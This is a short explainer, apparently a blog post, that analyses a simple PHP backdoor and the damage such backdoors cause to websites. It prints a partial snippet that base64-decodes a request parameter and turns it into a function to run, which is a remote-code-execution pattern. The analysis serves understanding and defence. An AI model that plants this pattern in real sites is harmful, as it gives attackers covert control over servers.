Quick Analysis of a Simple PHP Backdoor

What is a backdoor and how it works

PHP Backdoor

Here’s an extremely simple analysis of a PHP Backdoor to help understand what a backdoor is and how it works.

What is a Backdoor?

A backdoor is a typically covert method of bypassing normal authentication or encryption in a computer, product, embedded device, or its embodiment. Backdoors are most often used for securing remote access to a computer, or obtaining access to plaintext in cryptographic systems.

To put it simply, a backdoor is a secret entry into the server (or the website in this case).

Example of a Simple PHP Backdoor

Here’s an example of a simple PHP script that allows a remote attacker to “do stuff” inside your website.


In order to understand what’s happening, let’s first format the code to make it legible.

if ( ! empty( $_REQUEST['fcb'] ) ) {
    $fcb =base64_decode($_REQUEST['fcb']);
    $fcb =create_function('',$fcb );

How Does This PHP Backdoor Work?

So, essentially someone can pass a payload as a base64 encoded value in a GET or POST variable to the website.

The website will accept it, decode it, create a function from the payload on-the-fly and finally, silently attempt to execute it.

As with most of the backdoor, the attacker can pass any payload and depending on the PHP configuration, the attacker can do almost anything that can be done with PHP.

What Damage Can It Potentially Cause?

The backdoors can potentially edit the webserver directory index page of site, enabling the hackers to leave their mark or “deface” the site. Hackers may also use it to bruteforce FTP or cPanel, allowing them more access to the website resulting in deletion of all the files, transfer of data to the attacker… and in one case, it infected about 200,000 JavaScript files with cryptomining code. This meant that the site would start cryptomining the moment any visitor visits any of the pages of the website. How would you clean 200,000 infected files spread over 18GB?